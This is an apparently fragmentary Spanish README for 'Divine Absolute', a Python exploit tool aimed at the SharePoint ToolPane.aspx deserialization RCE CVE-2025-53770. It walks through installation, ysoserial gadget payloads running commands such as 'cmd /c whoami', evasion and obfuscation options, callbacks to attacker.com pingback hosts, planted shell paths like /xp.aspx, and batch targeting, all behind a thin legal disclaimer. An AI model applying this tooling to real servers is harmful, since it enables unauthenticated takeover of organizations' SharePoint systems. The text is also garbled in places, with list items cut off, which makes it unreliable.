
Una herramienta de explotación en Python sofisticada y guiada por asistentes dirigida a CVE-2025-53770, una vulnerabilidad crítica (CVSS 9.8) de ejecución remota de código (RCE) no autenticada en Microsoft SharePoint Server local (2016, 2019, Subscription Edition)
Divine Absolute es una herramienta de explotación Python sofisticada y guiada por un asistente que apunta a CVE-2025-53770, una vulnerabilidad crítica (CVSS 9.8) de ejecución remota de código (RCE) no autenticada en Microsoft SharePoint Server local (2016, 2019, Subscription Edition). Esta vulnerabilidad, revelada como día cero el 19 de julio de 2025, proviene de la deserialización de datos no confiables en /_layouts/15/ToolPane.aspx. La herramienta está diseñada solo para pruebas de penetración éticas e investigación de seguridad autorizada, ofreciendo precisión, sigilo y adaptabilidad inigualables para reconocimiento, explotación y verificación.
Repositorio: https://github.com/exfil0/CVE-2025-53770
⚠️ Advertencia Legal: Esta herramienta es solo para uso legal y autorizado en entornos controlados con permiso explícito. El uso no autorizado contra sistemas que no posees o para los que no tienes permiso de prueba es ilegal y puede resultar en graves consecuencias legales. El autor no asume ninguna responsabilidad por uso indebido.
ToolPane.aspx con puntuación avanzada y expresiones regulares (ej., 16.0.0.\d+-\w+?).ToolPane.aspx con robustas evasiones.WebRequest.Create, Dns.GetHostEntry).-enc)./xp.aspx, basados en UUID).www.google.com), URLs personalizadas, o rutas internas de SharePoint (ej., /_layouts/15/sharepoint.aspx).RequestException y códigos de estado/rutas personalizables.MicrosoftSharePointTeamServices), rutas (ej., /versions.aspx) y expresiones regulares./_layouts/15/ToolPane.aspx./ToolPane.aspx, usar reglas WAF (ej., Cloudflare).pip install requests termcolor
pip install pythonnet
ysoserial.exe en una ruta conocida (ej., ./ysoserial.exe).# Ubuntu/Debian
sudo apt-get install mono-complete
# macOS (via Homebrew)
brew install mono
docker pull mcr.microsoft.com/sharepoint/server:2019
git clone https://github.com/exfil0/CVE-2025-53770.git
cd CVE-2025-53770
pip install -r requirements.txt
ysoserial.exe sea accesible o proporcionar su ruta durante la ejecución.Ejecutar el asistente interactivo:
python divine_absolute.py
Recon: Escanea en busca de presencia y versión de SharePoint.Exploit: Envía payload a ToolPane.aspx.Full: Reconocimiento + explotación (modo agresivo opcional).https://sharepoint.example.com).ObjectDataProvider) y comando (ej., cmd /c whoami).http://attacker.com/callback o sub.attacker.com).NONE, BASIC_REFLECTION, CONCAT_OBFUSCATED o fragmento personalizado.NONE, FIXED (ej., /xp.aspx), RANDOM (basado en UUID).DEFAULT_SP, NO_REFERER, RANDOM_EXTERNAL, CUSTOM_URL.http://127.0.0.1:8080)./sitepages/result.txt), expresiones regulares (ej., Xanthorox.*), códigos de estado (ej., 200,403), intentos, retardo y timeout.python divine_absolute.py
# Seleccionar: Mode=Recon, Target=https://sharepoint.example.com
python divine_absolute.py
# Seleccionar: Mode=Exploit, Target=https://sharepoint.example.com, Payload=YSOSERIAL,
# ysoserial.exe path=./ysoserial.exe, Gadget=ObjectDataProvider,
# Command="cmd /c echo %COMPUTERNAME% > C:\Temp\out.txt"
python divine_absolute.py
# Seleccionar: Mode=Full, Target=target_list.txt, Payload=FILE, Payload File=payload.b64,
# Verify Path=/sitepages/out.txt, Regexes="COMPUTERNAME", Status Codes=200
python divine_absolute.py
# Seleccionar: Mode=Exploit, Payload=PINGBACK, Pingback URL=sub.attacker.com
Los resultados se guardan en xanthorox_results.json con los campos:
target: URL probada.sharepoint_detected: Booleano.toolpane_accessible: Booleano.exploited: Booleano (payload enviado).verified_rce: Booleano/None (RCE confirmado).error: Cualquier error encontrado.Ejemplo:
[
{
"target": "https://sharepoint.example.com",
"sharepoint_detected": true,
"toolpane_accessible": true,
"exploited": true,
"verified_rce": true,
"error": null
}
]